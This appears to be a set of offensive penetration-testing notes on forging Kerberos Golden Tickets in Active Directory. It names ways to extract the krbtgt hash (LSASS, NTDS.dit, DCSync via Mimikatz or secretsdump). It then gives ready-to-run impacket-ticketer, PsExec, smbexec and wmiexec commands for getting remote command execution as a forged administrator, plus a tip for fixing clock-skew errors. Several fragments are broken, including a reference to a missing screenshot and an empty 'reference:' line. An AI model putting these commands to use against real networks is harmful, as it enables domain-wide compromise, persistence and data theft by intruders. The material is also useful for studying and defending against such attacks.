This attack assumes a Domain Controller compromise where KRBTGT account hash will be extracted which is a requirement for a successful Golden Ticket attack.
A Golden Ticket attack consist on the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM hash of the Active Directory (AD) krbtgt account. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It's crucial to remember that the krbtgt account's credentials are never automatically updated.
To acquire the NTLM hash of the krbtgt account, various methods can be employed. It can be extracted from the Local Security Authority Subsystem Service (LSASS) process or the NT Directory Services (NTDS.dit) file located on any Domain Controller (DC) within the domain. Furthermore, executing a DCsync attack is another strategy to obtain this NTLM hash, which can be performed using tools such as the lsadump::dcsync module in Mimikatz or the secretsdump.py script by Impacket. It's important to underscore that to undertake these operations, domain admin privileges or a similar level of access is typically required.
Once you have the golden Ticket injected, you can access the shared files (C$), and execute services and WMI, so you could use psexec or wmiexec to obtain a shell (looks like yo can not get a shell via winrm).
switching back to the console the attacker used to create the golden ticket (local admin) and again attempting to access c$ share of the domain controller - this time is a success:
or Execute a cmd in the remote machine with PsExec:
.\PsExec.exe -accepteula \\<remote_hostname> cmd
reference:
Golden Ticket Attack from Linux
Requirement:
krbtgt hash
Domain SID
#powerview
Get-ADDomain <domain_name>
#impacket
# generate the TGT with NTLM
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> NewAdmin
# generate the TGT with AES key
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> NewAdmin
# export ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>
# execute remote command with any of the folowing by using TGT
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Don't forget to use hostname instead of IP address of the remote server
"Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)"
it's mean there is mismatch datetime between kali linux and the remote machine, because authenticating using TGT is using time also.
